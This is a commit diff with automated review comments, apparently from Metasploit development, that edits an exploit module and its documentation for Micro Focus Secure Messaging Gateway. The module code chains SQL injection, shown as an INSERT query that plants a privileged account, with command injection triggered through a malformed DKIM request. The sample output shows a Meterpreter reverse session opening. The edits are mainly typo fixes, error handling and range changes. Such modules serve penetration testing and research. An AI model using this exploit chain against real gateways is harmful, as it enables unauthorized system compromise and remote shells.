Fix typos and additional updates regarding the review

GSoC/Meterpreter_Web_Console
Mehmet İnce 2018-07-05 13:33:40 +01:00
parent 3b8149216f
commit a272dcabd7
2 changed files with 15 additions and 12 deletions


@ -7,7 +7,7 @@ Combining these vulnerabilities gives the opportunity execute operation system c
**Vulnerable Application Installation Steps**
Complate following trial submission form. You will be able to download the product as a OVA or ISO file.
Complete following trial submission form. You will be able to download the product as a OVA or ISO file.
[https://www.microfocus.com/products/secure-gateway/trial/](https://www.microfocus.com/products/secure-gateway/trial/)
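
Review bot: The corrected sentence still reads "Complete following trial submission form" and "a OVA or ISO file". Since the line is already being changed for the typo, make it "Complete the following trial submission form" and "an OVA or ISO file".
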
@ -28,7 +28,7 @@ A successful check of the exploit will look like this:
- [ ] **Verify** that you are seeing `Successfully authenticated` in console.
- [ ] **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console.
- [ ] **Verify** that you are seeing `Payload is successfully implanted` in console.
- [ ] **Verify** that you are seeing `Triggerring an implanted payload` in console.
- [ ] **Verify** that you are seeing `Triggering an implanted payload` in console.
- [ ] **Verify** that you are getting meterpreter session.
## Scenarios
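
Review bot: The second checklist item expects `Creating a domain with a malformed DKIM data`, but the sample run under Scenarios in this same file prints `Creating a domain record with a malformed DKIM data`. Make the checklist string match what the module prints, so that a tester who follows the verification steps literally finds the line.
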
@ -48,7 +48,7 @@ msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run
[+] Successfully authenticated
[*] Creating a domain record with a malformed DKIM data
[+] Payload is successfully implanted
[*] Triggerring an implanted payload
[*] Triggering an implanted payload
[*] Sending stage (37775 bytes) to 12.0.0.25
[*] Meterpreter session 10 opened (12.0.0.1:4444 -> 12.0.0.25:44332) at 2018-06-25 20:26:54 +0100
[*] Cleaning up...


@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
]
)
@ -129,8 +128,12 @@ class MetasploitModule < Msf::Exploit::Remote
if res && res.code == 200 && res.body.include?('DbNodeId')
# Defining as global variable since we need to access them later within clean up function.
@domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
@dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
begin
@domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
@dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
rescue => e
fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
end
print_good('Payload is successfully implanted')
else
something_went_wrong
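
Review bot: The bare `rescue => e` around the two `JSON.parse` calls catches every StandardError, so a body that is not valid JSON and a response with fewer than two `Nodes` entries both end in the same "Something went horribly wrong" message. Parse `res.body` once into a local, rescue `JSON::ParserError` explicitly, and check that both `Nodes` entries carry a `DbNodeId` before assigning, with a message that names which case occurred. The comment above the block also calls `@domainid` and `@dkimid` global variables; they are instance variables.
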
@ -140,11 +143,11 @@ class MetasploitModule < Msf::Exploit::Remote
def create_user
# We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection
# issue location where requires a valid session !
print_status('Creating an user with appropriate privileges')
print_status('Creating a user with appropriate privileges')
# Defining as global variable since we need to access them later within clean up function.
@username = rand_text_alpha_lower(5 + rand(20))
@userid = rand_text_numeric(6 + rand(2))
@username = rand_text_alpha_lower(5..25)
@userid = rand_text_numeric(6..8)
query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"
execute_query(query)
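
Review bot: The new ranges are not equivalent to the expressions they replace: `5 + rand(20)` yields 5 to 24 and `6 + rand(2)` yields 6 or 7, while `5..25` and `6..8`, if the helpers treat the range as inclusive, raise each upper bound by one. If the wider bound is intended, say so in the commit message; otherwise use `5..24` and `6..7`. The comment at the top of `create_user` still says "an user" although the `print_status` string below it was corrected.
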
@ -164,8 +167,8 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'),
'vars_post' => {
'username' => @username,
'password' => rand_text_alpha_lower(5 + rand(20)),
'passwordmandatory' => rand_text_alpha_lower(5 + rand(20)),
'password' => rand_text_alpha_lower(5..25),
'passwordmandatory' => rand_text_alpha_lower(5..25),
'LimitInterfaceId' => 1
}
)
@ -187,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
cookie = login
implant_payload(cookie)
print_status('Triggerring an implanted payload')
print_status('Triggering an implanted payload')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),